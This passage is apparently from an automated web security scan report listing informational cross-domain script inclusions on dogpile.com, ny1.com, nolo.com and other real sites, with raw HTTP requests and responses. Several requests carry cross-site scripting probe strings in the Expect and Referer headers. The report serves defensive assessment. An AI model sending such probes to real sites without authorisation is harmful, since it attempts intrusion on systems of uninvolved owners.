User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; wsRecent=MLB+Schedule,Web,Relevance,

Response

12.74. http://www.dogpile.com/dogpile_rss/web/MLB+Schedule previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/web/MLB+Schedule

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.75. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/about/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_rss/ws/about/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.76. http://www.dogpile.com/dogpile_rss/ws/aboutresults/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/aboutresults/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_rss/ws/aboutresults/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.77. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/faq/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_rss/ws/faq/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.78. http://www.dogpile.com/dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.79. http://www.dogpile.com/dogpile_rss/ws/index/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/index/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.80. http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/index/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_rss/ws/index/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.81. http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.82. http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.83. http://www.dogpile.com/dogpile_rss/ws/preferences/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/preferences/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_rss/ws/preferences/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 16:59:49 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=67d5f97c29004c7f95e7c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:49 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:49 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:48 GMT
Connection: close
Content-Length: 50929
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

12.84. http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.85. http://www.dogpile.com/dogpile_rss/ws/privacy/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/privacy/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_rss/ws/privacy/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.86. http://www.dogpile.com/dogpile_rss/ws/termsofuse/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/termsofuse/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

GET /dogpile_rss/ws/termsofuse/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.87. http://www.hy-vee.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hy-vee.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js
https://c.svlu.net/JInitScript.js
https://secure.quantserve.com/quant.js
https://www.google.com/jsapi

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hy-vee.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 20917
Date: Fri, 01 Apr 2011 16:04:46 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>

...[SNIP]...


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...


<script src="https://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.quantserve.com/quant.js"></script>
...[SNIP]...
<img width=0 height=0 src="https://c.svlu.net/pixel.aspx"/><script type="text/javascript" src="https://c.svlu.net/JInitScript.js"></script>
...[SNIP]...

12.88. http://www.jillianmichaels.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jillianmichaels.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jillianmichaels.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 17:06:37 GMT
Server: Microsoft-IIS/6.0
Server-ID: WEB01
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12440

<title id="tagTitle">Lose Weight Fast with Diet and Exercise Plans </title>
<meta id="tagDescription" name="description" content="Lose weight with Jillian Michaels' weight-loss plan! You don't n
...[SNIP]...
</center>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

12.89. http://www.mercantila.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mercantila.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://scripts.chitika.net/eminimalls/pixel.js
http://www.mercantila-checkout.com/setcookie.js
https://seal.buysafe.com/private/rollover/rollover.js
https://www.googleadservices.com/pagead/conversion.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:01:40 GMT
Server: Apache
Set-Cookie: mercServeBucket=merc-resources-gzip; path=/
Set-Cookie: mercServeCloud=dklnxffcpkmhm; path=/
Set-Cookie: PHPSESSID=1191364907574890868; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=1191364907574890868; expires=Thu, 27-Mar-2031 17:01:40 GMT; path=/
Vary: Accept-Encoding
Content-Length: 51267
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<title>Mercantila.c
...[SNIP]...
<LINK REL="StyleSheet" HREF="/maya_specialty_mercantila/css/nav2.css" TYPE="text/css">-->
<script language="JavaScript" type="text/javascript" src="http://www.mercantila-checkout.com/setcookie.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

<script src="https://seal.buysafe.com/private/rollover/rollover.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://scripts.chitika.net/eminimalls/pixel.js"></script>
...[SNIP]...

12.90. http://www.nolo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nolo.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nolo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Fri, 01 Apr 2011 15:41:46 GMT
Content-Length: 36012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

12.91. http://www.ny1.com/App_Skins/News1/Scripts/functions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ny1.com
Path:	/App_Skins/News1/Scripts/functions.js

Issue detail

The response dynamically includes the following script from another domain:

http://0/

Request

GET /App_Skins/News1/Scripts/functions.js HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 17137
Content-Type: application/x-javascript
Last-Modified: Fri, 10 Dec 2010 12:58:41 GMT
Accept-Ranges: bytes
ETag: "eef44ff86998cb1:3f53"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 18:10:00 GMT
Connection: close

/*
ON MENU SELECTION.

To mark a link from the navigation as selected, either:

1. Apply to the link element a class="selected", or
2. Apply to the link an id="btn_sectionName", where sectionNam
...[SNIP]...

if (document.addEventListener) {
document.addEventListener("DOMContentLoaded", init, false);
}

/* for Internet Explorer */
/*@cc_on
@if (@_win32 && @_jscript_version > 5.5)
document.write("<script id=__ie_onload defer src=//0><\/scr"+"ipt>
...[SNIP]...

12.92. http://www.ny1.com/Content/ServeContent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/NYCASP.json?callback=twitterCallback2&count=1

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 670
Cache-Control: no-cache, no-store, must-revalidate
Expires: Fri, 01 Apr 2011 18:10:32 GMT
Date: Fri, 01 Apr 2011 18:10:32 GMT
Connection: close

<div id="2bab76b1-4fca-462c-a6b8-d57e69252aae"><style type="text/css">@import "/App_Skins/Global/Styles/iframeContent.css";</style><div id="twitter_div">
<center><h2 class="sidebar-title"><a href='ht
...[SNIP]...
</div>
<script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/NYCASP.json?callback=twitterCallback2&count=1"></script>
...[SNIP]...

12.93. http://www.pg.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pg.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://js.revsci.net/gateway/gw.js?csid=F09828

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pg.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 17:25:37 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 556

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
</p>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

12.94. http://www.phonedog.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.phonedog.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://edge.quantserve.com/quant.js
http://partner.googleadservices.com/gampad/google_service.js
http://track.netshelter.net/js/sites/phonedog.com.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 15:42:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34516

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head id="_ctl0_Head1"><title>
Oops - this page was not found | PhoneDog
</title><me
...[SNIP]...
<meta id="_ctl0_metaKeywords" name="keywords">
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<![endif]-->

<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

<script src="http://track.netshelter.net/js/sites/phonedog.com.js"></script>
...[SNIP]...
<input type="image" value="search" name="sa" src="/3/img/header-search.gif" />
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

12.95. http://www.qctimes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.qctimes.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://stats.townnews.com/shared-content/stats/common/tracker.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.qctimes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: WWW
Cache-Control: public, max-age=300
Content-Type: text/html
Date: Fri, 01 Apr 2011 17:09:28 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
Location: http://qctimes.com/favicon.ico
Accept-Ranges: bytes
X-PHP-Engine: enabled
Real-Hostname: qctimes.com
Content-Length: 585
Connection: Keep-Alive
X-Cache-Info: cached

<!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head><title>301 Moved Permanently</title></head><body>
<script type='text/javascript' src='http://stats.townnews.com/shared-content/stats/common/tracker.js'></script>
...[SNIP]...

12.96. http://www.soccer.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soccer.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

https://seal.verisign.com/getseal?host_name=www.soccer.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.soccer.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 41217
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Fri, 01 Apr 2011 16:49:22 GMT
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

<script src="https://seal.verisign.com/getseal?host_name=www.soccer.com&size=S&use_flash=NO&use_transparent=NO&lang=en"></script>
...[SNIP]...

12.97. http://www.tonzr.com/favicon.ico previous next

Summary

Severity:	Information
